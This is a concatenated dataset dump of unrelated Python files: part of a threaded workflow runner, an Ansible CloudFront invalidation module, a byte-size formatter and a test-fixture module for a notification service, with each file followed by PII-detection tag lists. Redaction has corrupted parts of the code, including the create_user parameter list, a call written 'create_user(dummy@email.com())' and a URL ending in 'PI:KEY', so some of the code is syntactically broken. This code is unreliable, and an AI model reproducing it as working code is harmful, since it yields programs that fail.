while not taskqueue.empty(): # Empty the queue
taskqueue.get()
for i in threads:
i.kill_received=True
i.kill()
exit(1)
'''
print ""Joining taskqueue""
# At this point all of the tasks should be finished so we join them
notfinished=1
while notfinished==1:
notfinished=0
for i in range(num_threads):
if threadtasknums[i]<999999:
notfinished=1
time.sleep(1)
#while not taskqueue.join(1):
# time.sleep(1)
print ""Finished node workflow""
# Run main
if __name__==""__main__"":
main()
",7938,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Eric Shook'], ['PERSON', ""getopt\n\n'""], ['PERSON', 'TODO'], ['PERSON', 'tasknum=taskfile.split(""/"",1)[1].split(""'], ['PERSON', 'tasknum=re.sub(""\\D'], ['PERSON', 'tasknum'], ['PERSON', 'mintasknum=min(threadtasknums'], ['PERSON', 'tasksdir'], ['LOCATION', '.join'], ['DATE_TIME', '5 seconds'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'subprocess.ch'], ['URL', 'taskqueue.ge'], ['URL', 're.su'], ['URL', 'time.sl'], ['URL', 'datetime.datetime.no'], ['URL', 'getopt.ge'], ['URL', 'sys.ar'], ['URL', 'getopt.Ge'], ['URL', 'workflow.py'], ['URL', 'workflow.py'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'f.cl'], ['URL', 'os.li'], ['URL', 'taskfiles.so'], ['URL', 'taskfile.st'], ['URL', 'threading.Th'], ['URL', 't.se'], ['URL', 't.st'], ['URL', 'threading.ac'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'taskqueue.ge'], ['URL', 'i.ki'], ['URL', 'i.ki'], ['URL', 'time.sl'], ['URL', 'taskqueue.jo'], ['URL', 'time.sl']]"
97,"#!/usr/bin/python
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cloudfront_invalidation
short_description: create invalidations for AWS CloudFront distributions
description:
- Allows for invalidation of a batch of paths for a CloudFront distribution.
requirements:
- boto3 >= 1.0.0
- python >= 2.6
version_added: ""2.5""
author: Willem van Ketwich (@wilvk)
extends_documentation_fragment:
- aws
- ec2
options:
distribution_id:
description:
- The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.
required: false
type: str
alias:
description:
- The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.
required: false
type: str
caller_reference:
description:
- A unique reference identifier for the invalidation paths.
- Defaults to current datetime stamp.
required: false
default:
type: str
target_paths:
description:
- A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed, e.g. '/foo/bar/*'.
required: true
type: list
elements: str
notes:
- does not support check mode
'''
EXAMPLES = '''
- name: create a batch of invalidations using a distribution_id for a reference
cloudfront_invalidation:
distribution_id: E15BU8SDCGSG57
caller_reference: testing 123
target_paths:
- /testpathone/test1.css
- /testpathtwo/test2.js
- /testpaththree/test3.ss
- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match
cloudfront_invalidation:
alias: alias.test.com
caller_reference: testing 123
target_paths:
- /testpathone/test4.css
- /testpathtwo/test5.js
- /testpaththree/*
'''
RETURN = '''
invalidation:
description: The invalidation's information.
returned: always
type: complex
contains:
create_time:
description: The date and time the invalidation request was first made.
returned: always
type: str
sample: '2018-02-01T15:50:41.159000+00:00'
id:
description: The identifier for the invalidation request.
returned: always
type: str
sample: I2G9MOWJZFV612
invalidation_batch:
description: The current invalidation information for the batch request.
returned: always
type: complex
contains:
caller_reference:
description: The value used to uniquely identify an invalidation request.
returned: always
type: str
sample: testing 123
paths:
description: A dict that contains information about the objects that you want to invalidate.
returned: always
type: complex
contains:
items:
description: A list of the paths that you want to invalidate.
returned: always
type: list
sample:
- /testpathtwo/test2.js
- /testpathone/test1.css
- /testpaththree/test3.ss
quantity:
description: The number of objects that you want to invalidate.
returned: always
type: int
sample: 3
status:
description: The status of the invalidation request.
returned: always
type: str
sample: Completed
location:
description: The fully qualified URI of the distribution and invalidation batch request.
returned: always
type: str
sample: https://cloudfront.amazonaws.PI:KEY
'''
from ansible.module_utils.ec2 import get_aws_connection_info
from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn
from ansible.module_utils.ec2 import snake_dict_to_camel_dict
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager
import datetime
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by imported AnsibleAWSModule
class CloudFrontInvalidationServiceManager(object):
""""""
Handles CloudFront service calls to AWS for invalidations
""""""
def __init__(self, module):
self.module = module
self.create_client('cloudfront')
def create_client(self, resource):
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)
self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)
def create_invalidation(self, distribution_id, invalidation_batch):
current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference'])
try:
response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)
response.pop('ResponseMetadata', None)
if current_invalidation_response:
return response, False
else:
return response, True
except BotoCoreError as e:
self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")
except ClientError as e:
if ('Your request contains a caller reference that was used for a previous invalidation batch '
'for the same distribution.' in e.response['Error']['Message']):
self.module.warn(""InvalidationBatch target paths are not modifiable. ""
""To make a new invalidation please update caller_reference."")
return current_invalidation_response, False
else:
self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")
def get_invalidation(self, distribution_id, caller_reference):
current_invalidation = {}
# find all invalidations for the distribution
try:
paginator = self.client.get_paginator('list_invalidations')
invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', [])
invalidation_ids = [inv['Id'] for inv in invalidations]
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg=""Error listing CloudFront invalidations."")
# check if there is an invalidation with the same caller reference
for inv_id in invalidation_ids:
try:
invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation']
caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference')
except (BotoCoreError, ClientError) as e:
self.module.fail_json_aws(e, msg=""Error getting CloudFront invalidation {0}"".format(inv_id))
if caller_ref == caller_reference:
current_invalidation = invalidation
break
current_invalidation.pop('ResponseMetadata', None)
return current_invalidation
class CloudFrontInvalidationValidationManager(object):
""""""
Manages CloudFront validations for invalidation batches
""""""
def __init__(self, module):
self.module = module
self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)
def validate_distribution_id(self, distribution_id, alias):
try:
if distribution_id is None and alias is None:
self.module.fail_json(msg=""distribution_id or alias must be specified"")
if distribution_id is None:
distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)
return distribution_id
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg=""Error validating parameters."")
def create_aws_list(self, invalidation_batch):
aws_list = {}
aws_list[""Quantity""] = len(invalidation_batch)
aws_list[""Items""] = invalidation_batch
return aws_list
def validate_invalidation_batch(self, invalidation_batch, caller_reference):
try:
if caller_reference is not None:
valid_caller_reference = caller_reference
else:
valid_caller_reference = datetime.datetime.now().isoformat()
valid_invalidation_batch = {
'paths': self.create_aws_list(invalidation_batch),
'caller_reference': valid_caller_reference
}
return valid_invalidation_batch
except (ClientError, BotoCoreError) as e:
self.module.fail_json_aws(e, msg=""Error validating invalidation batch."")
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
caller_reference=dict(),
distribution_id=dict(),
alias=dict(),
target_paths=dict(required=True, type='list')
))
module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']])
validation_mgr = CloudFrontInvalidationValidationManager(module)
service_mgr = CloudFrontInvalidationServiceManager(module)
caller_reference = module.params.get('caller_reference')
distribution_id = module.params.get('distribution_id')
alias = module.params.get('alias')
target_paths = module.params.get('target_paths')
result = {}
distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)
valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)
valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)
result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))
if __name__ == '__main__':
main()
",10484,"[['DATE_TIME', '2017'], ['PERSON', 'Willem van Ketwich'], ['DATE_TIME', '2018-02-01T15:50:41.159000+'], ['DATE_TIME', ""00:00'\n i""], ['PERSON', 'aws_connect_kwargs = get_aws_connection_info(self.module'], ['URL', 'self.mo'], ['LOCATION', 'BotoCoreError'], ['LOCATION', 'BotoCoreError'], ['PERSON', ""caller_reference = module.params.get('caller_reference'""], ['LOCATION', 'validation_mgr.validate_invalidation_batch(target_paths'], ['URL', 'https://www.gnu.org/licenses/gpl-3.0.txt'], ['URL', 'https://cloudfront.am'], ['URL', 'alias.test.com'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.co'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.cl'], ['URL', 'self.mo'], ['URL', 'self.cr'], ['URL', 'self.cl'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.client.cr'], ['URL', 'self.mo'], ['URL', 'e.re'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'paginator.pa'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'invalidation.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'mgr.ge'], ['URL', 'self.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'self.cr'], ['URL', 'self.mo'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'mgr.va'], ['URL', 'mgr.va'], ['URL', 'mgr.cr']]"
98,"#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND
# Yves Junqueira (dummy@email.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# from http://www.voidspace.org.uk/python/pathutils.html (BSD License)
def formatbytes(sizeint, configdict=None, **configs):
""""""
Given a file size as an integer, return a nicely formatted string that
represents the size. Has various options to control its output.
You can pass in a dictionary of arguments or keyword arguments. Keyword
arguments override the dictionary and there are sensible defaults for options
you don't set.
Options and defaults are as follows :
* ``forcekb = False`` - If set this forces the output to be in terms
of kilobytes and bytes only.
* ``largestonly = True`` - If set, instead of outputting
``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest
denominator - e.g. ``1.3 Mbytes`` or ``17.2 Kbytes``
* ``kiloname = 'Kbytes'`` - The string to use for kilobytes
* ``meganame = 'Mbytes'`` - The string to use for Megabytes
* ``bytename = 'bytes'`` - The string to use for bytes
* ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``,
notice there is no space.
Example outputs : ::
19Mbytes, 75Kbytes, 255bytes
2Kbytes, 0bytes
23.8Mbytes
.. note::
It currently uses the plural form even for singular.
""""""
defaultconfigs = { 'forcekb' : False,
'largestonly' : True,
'kiloname' : 'Kbytes',
'meganame' : 'Mbytes',
'bytename' : 'bytes',
'nospace' : True}
if configdict is None:
configdict = {}
for entry in configs:
# keyword parameters override the dictionary passed in
configdict[entry] = configs[entry]
#
for keyword in defaultconfigs:
if not configdict.has_key(keyword):
configdict[keyword] = defaultconfigs[keyword]
#
if configdict['nospace']:
space = ''
else:
space = ' '
#
mb, kb, rb = bytedivider(sizeint)
if configdict['largestonly']:
if mb and not configdict['forcekb']:
return stringround(mb, kb)+ space + configdict['meganame']
elif kb or configdict['forcekb']:
if mb and configdict['forcekb']:
kb += 1024*mb
return stringround(kb, rb) + space+ configdict['kiloname']
else:
return str(rb) + space + configdict['bytename']
else:
outstr = ''
if mb and not configdict['forcekb']:
outstr = str(mb) + space + configdict['meganame'] +', '
if kb or configdict['forcekb'] or mb:
if configdict['forcekb']:
kb += 1024*mb
outstr += str(kb) + space + configdict['kiloname'] +', '
return outstr + str(rb) + space + configdict['bytename']
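# formatbytes relies on two pathutils helpers that are not shown above. Minimal
# sketches follow (hedged -- the real pathutils implementations may differ in
# detail, e.g. in how rounded values are formatted):
def bytedivider(nbytes):
    '''Split an integer byte count into (megabytes, kilobytes, remaining bytes).'''
    mb, remainder = divmod(nbytes, 1024 * 1024)
    kb, rb = divmod(remainder, 1024)
    return (mb, kb, rb)

def stringround(main, rest):
    '''Round main units plus rest subunits (1024ths of a unit) to one decimal
    place, e.g. stringround(1, 512) -> '1.5'.'''
    return str(round(main + rest / 1024.0, 1))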
",3822,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2006'], ['PERSON', 'José de Paula Eufrásio Junior'], ['PERSON', 'Yves Junqueira'], ['PERSON', 'Franklin St'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'Mbytes'], ['PERSON', 'largestonly'], ['PERSON', 'meganame'], ['PERSON', 'Mbytes'], ['LOCATION', 'stringround(mb'], ['URL', 'http://www.voidspace.org.uk/python/pathutils.html'], ['IP_ADDRESS', '\n \n '], ['IP_ADDRESS', 'e::\n \n '], ['URL', 'email.com'], ['URL', 'email.com']]"
99,"import random
import uuid
from datetime import date, datetime, timedelta
import pytest
from app import db
from app.dao import fact_processing_time_dao
from app.dao.email_branding_dao import dao_create_email_branding
from app.dao.inbound_sms_dao import dao_create_inbound_sms
from app.dao.invited_org_user_dao import save_invited_org_user
from app.dao.invited_user_dao import save_invited_user
from app.dao.jobs_dao import dao_create_job
from app.dao.notifications_dao import dao_create_notification
from app.dao.organisation_dao import (
dao_add_service_to_organisation,
dao_create_organisation,
)
from app.dao.permissions_dao import permission_dao
from app.dao.service_callback_api_dao import save_service_callback_api
from app.dao.service_data_retention_dao import insert_service_data_retention
from app.dao.service_inbound_api_dao import save_service_inbound_api
from app.dao.service_permissions_dao import dao_add_service_permission
from app.dao.service_sms_sender_dao import (
dao_update_service_sms_sender,
update_existing_sms_sender_with_inbound_number,
)
from app.dao.services_dao import dao_add_user_to_service, dao_create_service
from app.dao.templates_dao import dao_create_template, dao_update_template
from app.dao.users_dao import save_model_user
from app.models import (
EMAIL_TYPE,
KEY_TYPE_NORMAL,
LETTER_TYPE,
MOBILE_TYPE,
SMS_TYPE,
AnnualBilling,
ApiKey,
BroadcastEvent,
BroadcastMessage,
BroadcastProvider,
BroadcastProviderMessage,
BroadcastProviderMessageNumber,
BroadcastStatusType,
Complaint,
DailySortedLetter,
Domain,
EmailBranding,
FactBilling,
FactNotificationStatus,
FactProcessingTime,
InboundNumber,
InboundSms,
InvitedOrganisationUser,
InvitedUser,
Job,
LetterBranding,
LetterRate,
Notification,
NotificationHistory,
Organisation,
Permission,
Rate,
ReturnedLetter,
Service,
ServiceCallbackApi,
ServiceContactList,
ServiceEmailReplyTo,
ServiceGuestList,
ServiceInboundApi,
ServiceLetterContact,
ServicePermission,
ServiceSmsSender,
Template,
TemplateFolder,
User,
WebauthnCredential,
)
def create_user(
*,
mobile_number=""+447700900986"",
dummy@email.com"",
state='active',
id_=None,
name=""Test User""
):
data = {
'id': id_ or uuid.uuid4(),
'name': name,
'email_address': email,
'password': 'password',
'mobile_number': mobile_number,
'state': state
}
user = User.query.filter_by(email_address=email).first()
if not user:
user = User(**data)
save_model_user(user, validated_email_access=True)
return user
def create_permissions(user, service, *permissions):
permissions = [
Permission(service_id=service.id, user_id=user.id, permission=p)
for p in permissions
]
permission_dao.set_user_service_permission(user, service, permissions, _commit=True)
def create_service(
user=None,
service_name=""Sample service"",
service_id=None,
restricted=False,
count_as_live=True,
service_permissions=None,
research_mode=False,
active=True,
email_from=None,
prefix_sms=True,
message_limit=1000,
organisation_type='central',
check_if_service_exists=False,
go_live_user=None,
go_live_at=None,
crown=True,
organisation=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
if check_if_service_exists:
service = Service.query.filter_by(name=service_name).first()
if (not check_if_service_exists) or (check_if_service_exists and not service):
service = Service(
name=service_name,
message_limit=message_limit,
restricted=restricted,
email_from=email_from if email_from else service_name.lower().replace(' ', '.'),
created_by=user if user else create_user(dummy@email.com())),
prefix_sms=prefix_sms,
organisation_type=organisation_type,
organisation=organisation,
go_live_user=go_live_user,
go_live_at=go_live_at,
crown=crown,
purchase_order_number=purchase_order_number,
billing_contact_names=billing_contact_names,
billing_contact_email_addresses=billing_contact_email_addresses,
billing_reference=billing_reference,
)
dao_create_service(
service,
service.created_by,
service_id,
service_permissions=service_permissions,
)
service.active = active
service.research_mode = research_mode
service.count_as_live = count_as_live
else:
if user and user not in service.users:
dao_add_user_to_service(service, user)
return service
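# Example usage (illustrative; not from the source):
#   service = create_service(service_name='Sample service', service_permissions=[SMS_TYPE])
#   # with check_if_service_exists=True, a second call with the same name
#   # returns the existing service instead of creating a duplicate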
def create_service_with_inbound_number(
inbound_number='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
inbound = create_inbound_number(number=inbound_number, service_id=service.id)
update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender,
sms_sender=inbound_number,
inbound_number_id=inbound.id)
return service
def create_service_with_defined_sms_sender(
sms_sender_value='1234567',
*args, **kwargs
):
service = create_service(*args, **kwargs)
sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()
dao_update_service_sms_sender(service_id=service.id,
service_sms_sender_id=sms_sender.id,
is_default=True,
sms_sender=sms_sender_value)
return service
def create_template(
service,
template_type=SMS_TYPE,
template_name=None,
subject='Template subject',
content='Dear Sir/Madam, Hello. Yours Truly, The Government.',
reply_to=None,
hidden=False,
archived=False,
folder=None,
postage=None,
process_type='normal',
contact_block_id=None
):
data = {
'name': template_name or '{} Template Name'.format(template_type),
'template_type': template_type,
'content': content,
'service': service,
'created_by': service.created_by,
'reply_to': reply_to,
'hidden': hidden,
'folder': folder,
'process_type': process_type,
}
if template_type == LETTER_TYPE:
data[""postage""] = postage or ""second""
if contact_block_id:
data['service_letter_contact_id'] = contact_block_id
if template_type != SMS_TYPE:
data['subject'] = subject
template = Template(**data)
dao_create_template(template)
if archived:
template.archived = archived
dao_update_template(template)
return template
def create_notification(
template=None,
job=None,
job_row_number=None,
to_field=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
personalisation=None,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
scheduled_for=None,
normalised_to=None,
one_off=False,
reply_to_text=None,
created_by_id=None,
postage=None,
document_download_count=None,
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if to_field is None:
to_field = '+447700900855' if template.template_type == SMS_TYPE else 'dummy@email.com'
if status not in ('created', 'validation-failed', 'virus-scan-failed', 'pending-virus-check'):
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if not one_off and (job is None and api_key is None):
# we did not specify in test - lets create it
api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first()
if not api_key:
api_key = create_api_key(template.service, key_type=key_type)
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': uuid.uuid4(),
'to': to_field,
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'personalisation': personalisation,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'normalised_to': normalised_to,
'reply_to_text': reply_to_text,
'created_by_id': created_by_id,
'postage': postage,
'document_download_count': document_download_count,
}
notification = Notification(**data)
dao_create_notification(notification)
return notification
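# Example usage in a test (illustrative; not from the source):
#   service = create_service()
#   template = create_template(service=service)
#   notification = create_notification(template=template, status='delivered')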
def create_notification_history(
template=None,
job=None,
job_row_number=None,
status='created',
reference=None,
created_at=None,
sent_at=None,
updated_at=None,
billable_units=1,
api_key=None,
key_type=KEY_TYPE_NORMAL,
sent_by=None,
client_reference=None,
rate_multiplier=None,
international=False,
phone_prefix=None,
created_by_id=None,
postage=None,
id=None
):
assert job or template
if job:
template = job.template
if created_at is None:
created_at = datetime.utcnow()
if status != 'created':
sent_at = sent_at or datetime.utcnow()
updated_at = updated_at or datetime.utcnow()
if template.template_type == 'letter' and postage is None:
postage = 'second'
data = {
'id': id or uuid.uuid4(),
'job_id': job and job.id,
'job': job,
'service_id': template.service.id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'status': status,
'reference': reference,
'created_at': created_at,
'sent_at': sent_at,
'billable_units': billable_units,
'notification_type': template.template_type,
'api_key': api_key,
'api_key_id': api_key and api_key.id,
'key_type': api_key.key_type if api_key else key_type,
'sent_by': sent_by,
'updated_at': updated_at,
'client_reference': client_reference,
'job_row_number': job_row_number,
'rate_multiplier': rate_multiplier,
'international': international,
'phone_prefix': phone_prefix,
'created_by_id': created_by_id,
'postage': postage
}
notification_history = NotificationHistory(**data)
db.session.add(notification_history)
db.session.commit()
return notification_history
def create_job(
template,
notification_count=1,
created_at=None,
job_status='pending',
scheduled_for=None,
processing_started=None,
processing_finished=None,
original_file_name='some.csv',
archived=False,
contact_list_id=None,
):
data = {
'id': uuid.uuid4(),
'service_id': template.service_id,
'service': template.service,
'template_id': template.id,
'template_version': template.version,
'original_file_name': original_file_name,
'notification_count': notification_count,
'created_at': created_at or datetime.utcnow(),
'created_by': template.created_by,
'job_status': job_status,
'scheduled_for': scheduled_for,
'processing_started': processing_started,
'processing_finished': processing_finished,
'archived': archived,
'contact_list_id': contact_list_id,
}
job = Job(**data)
dao_create_job(job)
return job
def create_service_permission(service_id, permission=EMAIL_TYPE):
dao_add_service_permission(
service_id if service_id else create_service().id, permission)
service_permissions = ServicePermission.query.all()
return service_permissions
def create_inbound_sms(
service,
notify_number=None,
user_number='447700900111',
provider_date=None,
provider_reference=None,
content='Hello',
provider=""mmg"",
created_at=None
):
if not service.inbound_number:
create_inbound_number(
# create random inbound number
notify_number or '07{:09}'.format(random.randint(0, 1e9 - 1)),
provider=provider,
service_id=service.id
)
inbound = InboundSms(
service=service,
created_at=created_at or datetime.utcnow(),
notify_number=service.get_inbound_number(),
user_number=user_number,
provider_date=provider_date or datetime.utcnow(),
provider_reference=provider_reference or 'foo',
content=content,
provider=provider
)
dao_create_inbound_sms(inbound)
return inbound
def create_service_inbound_api(
service,
url=""https://something.com"",
bearer_token=""some_super_secret"",
):
service_inbound_api = ServiceInboundApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id
)
save_service_inbound_api(service_inbound_api)
return service_inbound_api
def create_service_callback_api(
service,
url=""https://something.com"",
bearer_token=""some_super_secret"",
callback_type=""delivery_status""
):
service_callback_api = ServiceCallbackApi(service_id=service.id,
url=url,
bearer_token=bearer_token,
updated_by_id=service.users[0].id,
callback_type=callback_type
)
save_service_callback_api(service_callback_api)
return service_callback_api
def create_email_branding(colour='blue', logo='test_x2.png', name='test_org_1', text='DisplayName'):
data = {
'colour': colour,
'logo': logo,
'name': name,
'text': text,
}
email_branding = EmailBranding(**data)
dao_create_email_branding(email_branding)
return email_branding
def create_rate(start_date, value, notification_type):
rate = Rate(
id=uuid.uuid4(),
valid_from=start_date,
rate=value,
notification_type=notification_type
)
db.session.add(rate)
db.session.commit()
return rate
def create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class='second'):
if start_date is None:
start_date = datetime(2016, 1, 1)
rate = LetterRate(
id=uuid.uuid4(),
start_date=start_date,
end_date=end_date,
crown=crown,
sheet_count=sheet_count,
rate=rate,
post_class=post_class
)
db.session.add(rate)
db.session.commit()
return rate
def create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None):
id_ = uuid.uuid4()
name = key_name if key_name else '{} api key {}'.format(key_type, id_)
api_key = ApiKey(
service=service,
name=name,
created_by=service.created_by,
key_type=key_type,
id=id_,
secret=uuid.uuid4()
)
db.session.add(api_key)
db.session.commit()
return api_key
def create_inbound_number(number, provider='mmg', active=True, service_id=None):
inbound_number = InboundNumber(
id=uuid.uuid4(),
number=number,
provider=provider,
active=active,
service_id=service_id
)
db.session.add(inbound_number)
db.session.commit()
return inbound_number
def create_reply_to_email(
service,
email_address,
is_default=True,
archived=False
):
data = {
'service': service,
'email_address': email_address,
'is_default': is_default,
'archived': archived,
}
reply_to = ServiceEmailReplyTo(**data)
db.session.add(reply_to)
db.session.commit()
return reply_to
def create_service_sms_sender(
service,
sms_sender,
is_default=True,
inbound_number_id=None,
archived=False
):
data = {
'service_id': service.id,
'sms_sender': sms_sender,
'is_default': is_default,
'inbound_number_id': inbound_number_id,
'archived': archived,
}
service_sms_sender = ServiceSmsSender(**data)
db.session.add(service_sms_sender)
db.session.commit()
return service_sms_sender
def create_letter_contact(
service,
contact_block,
is_default=True,
archived=False
):
data = {
'service': service,
'contact_block': contact_block,
'is_default': is_default,
'archived': archived,
}
letter_content = ServiceLetterContact(**data)
db.session.add(letter_content)
db.session.commit()
return letter_content
def create_annual_billing(
service_id, free_sms_fragment_limit, financial_year_start
):
annual_billing = AnnualBilling(
service_id=service_id,
free_sms_fragment_limit=free_sms_fragment_limit,
financial_year_start=financial_year_start
)
db.session.add(annual_billing)
db.session.commit()
return annual_billing
def create_domain(domain, organisation_id):
domain = Domain(domain=domain, organisation_id=organisation_id)
db.session.add(domain)
db.session.commit()
return domain
def create_organisation(
name='test_org_1',
active=True,
organisation_type=None,
domains=None,
organisation_id=None,
purchase_order_number=None,
billing_contact_names=None,
billing_contact_email_addresses=None,
billing_reference=None,
):
data = {
'id': organisation_id,
'name': name,
'active': active,
'organisation_type': organisation_type,
'purchase_order_number': purchase_order_number,
'billing_contact_names': billing_contact_names,
'billing_contact_email_addresses': billing_contact_email_addresses,
'billing_reference': billing_reference,
}
organisation = Organisation(**data)
dao_create_organisation(organisation)
for domain in domains or []:
create_domain(domain, organisation.id)
return organisation
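# Illustrative sketch: create_organisation also creates one Domain row per
# entry in `domains`, so a test can seed an organisation and its domains in a
# single call. The names and organisation_type below are placeholder values.
def _example_organisation_with_domains():
    return create_organisation(
        name='Example Org',
        organisation_type='central',
        domains=['example.gov.uk', 'example.org.uk'],
    )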
def create_invited_org_user(organisation, invited_by, email_address='dummy@email.com'):
invited_org_user = InvitedOrganisationUser(
email_address=email_address,
invited_by=invited_by,
organisation=organisation,
)
save_invited_org_user(invited_org_user)
return invited_org_user
def create_daily_sorted_letter(billing_day=None,
file_name=""Notify-20180118123.rs.txt"",
unsorted_count=0,
sorted_count=0):
daily_sorted_letter = DailySortedLetter(
billing_day=billing_day or date(2018, 1, 18),
file_name=file_name,
unsorted_count=unsorted_count,
sorted_count=sorted_count
)
db.session.add(daily_sorted_letter)
db.session.commit()
return daily_sorted_letter
def create_ft_billing(bst_date,
template,
*,
provider='test',
rate_multiplier=1,
international=False,
rate=0,
billable_unit=1,
notifications_sent=1,
postage='none'
):
data = FactBilling(bst_date=bst_date,
service_id=template.service_id,
template_id=template.id,
notification_type=template.template_type,
provider=provider,
rate_multiplier=rate_multiplier,
international=international,
rate=rate,
billable_units=billable_unit,
notifications_sent=notifications_sent,
postage=postage)
db.session.add(data)
db.session.commit()
return data
def create_ft_notification_status(
bst_date,
notification_type='sms',
service=None,
template=None,
job=None,
key_type='normal',
notification_status='delivered',
count=1
):
if job:
template = job.template
if template:
service = template.service
notification_type = template.template_type
else:
if not service:
service = create_service()
template = create_template(service=service, template_type=notification_type)
data = FactNotificationStatus(
bst_date=bst_date,
template_id=template.id,
service_id=service.id,
job_id=job.id if job else uuid.UUID(int=0),
notification_type=notification_type,
key_type=key_type,
notification_status=notification_status,
notification_count=count
)
db.session.add(data)
db.session.commit()
return data
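# Illustrative sketch: the helper above derives template and service from the
# most specific argument supplied (job beats template beats service), so a
# bare call stubs out everything it needs.
def _example_ft_notification_status_row():
    return create_ft_notification_status(bst_date=date(2021, 3, 1))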
def create_process_time(bst_date='2021-03-01', messages_total=35, messages_within_10_secs=34):
data = FactProcessingTime(
bst_date=bst_date,
messages_total=messages_total,
messages_within_10_secs=messages_within_10_secs
)
fact_processing_time_dao.insert_update_processing_time(data)
